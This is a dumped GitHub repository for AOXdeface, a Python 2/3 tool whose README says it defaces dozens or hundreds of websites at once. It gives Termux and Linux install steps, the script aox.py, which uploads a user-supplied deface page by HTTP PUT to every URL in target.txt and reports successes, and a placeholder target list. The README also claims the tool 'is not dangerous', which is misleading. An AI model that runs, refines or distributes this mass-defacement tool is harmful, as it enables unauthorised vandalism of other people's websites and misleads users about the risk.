Repository: Ranginang67/AOXdeface Branch: master Commit: 184e72b86360 Files: 4 Total size: 3.0 KB Directory structure: gitextract_gj05al1v/ ├── README.md ├── aox.py ├── img/ │ └── example └── target.txt ================================================ FILE CONTENTS ================================================ ================================================ FILE: README.md ================================================ # AOXdeface what is AOXdeface tools?
AOXdeface is a tool for defacing dozens or hundreds of sites at once,depending on the number of sites that have been determined by you, this is not dangerous, and this is only the file upload method
INDONESIA:
AOXdeface adalah alat untuk melakukan defacing terhadap puluhan atau ratusan situs sekaligus,
tergantung pada jumlah situs yang telah ditentukan oleh kamu :V, ini tidak berbahaya,
dan ini hanya metode upload file saja **screnshoot:** ![1](https://github.com/Ranginang67/AOXdeface/blob/master/img/aox.png) **how to install and usage:** **Termux:** * `pkg install python2` * `pip2 install requests` * `pkg install git` * `git clone https://github.com/Ranginang67/AOXdeface` * `cd AOXdeface` * `python2 aox.py` **Linux:** * `apt-get install python` * `apt-get install pthon-pip` * `pip install requests` * `apt-get install git` * `git clone https://github.com/Ranginang67/AOXdeface` * `cd AOXdeface` * `python aox.py` **NOTE:** before using this tool, put your deface script with the aox.py file, edit the file 'target.txt' and enter the target url [YOUTUBE](https://www.youtube.com/channel/UCNMD5U02GFeWLqmrl_XSPGQ)
[TLEGRAM](https://t.me/Msambari) ================================================ FILE: aox.py ================================================ #-*- coding: utf-8 -*- try: import requests import os.path import sys except ImportError: exit("install requests and try again ...") banner = """ █████╗ ██╗ ██╗██████╗ Author : Ms.ambari ██╔══██╗╚██╗██╔╝██╔══██╗ Date : 2018-12-01 ███████║ ╚███╔╝ ██║ ██║ Tools : aoXdeface V.1.0 ██╔══██║ ██╔██╗ ██║ ██║ Github : /Ranginang67 ██║ ██║██╔╝ ██╗██████╔╝ youtube: Ms.ambari ╚═╝ ╚═╝╚═╝ ╚═╝╚═════╝ """ b = '\033[31m' h = '\033[32m' m = '\033[00m' def x(tetew): ipt = '' if sys.version_info.major > 2: ipt = input(tetew) else: ipt = raw_input(tetew) return str(ipt) def aox(script,target_file="target.txt"): op = open(script,"r").read() with open(target_file, "r") as target: target = target.readlines() s = requests.Session() print("uploading file to %d website"%(len(target))) for web in target: try: site = web.strip() if site.startswith("http://") is False: site = "http://" + site req = s.put(site+"/"+script,data=op) if req.status_code < 200 or req.status_code >= 250: print(m+"["+b+" FAILED!"+m+" ] %s/%s"%(site,script)) else: print(m+"["+h+" SUCCESS"+m+" ] %s/%s"%(site,script)) except requests.exceptions.RequestException: continue except KeyboardInterrupt: print; exit() def main(__bn__): print(__bn__) while True: try: a = x("Enter your script deface name: ") if not os.path.isfile(a): print("file '%s' not found"%(a)) continue else: break except KeyboardInterrupt: print; exit() aox(a) if __name__ == "__main__": main(banner) ================================================ FILE: img/example ================================================ ================================================ FILE: target.txt ================================================ http://your-target1.com http://your-target2.com http://your-target2.com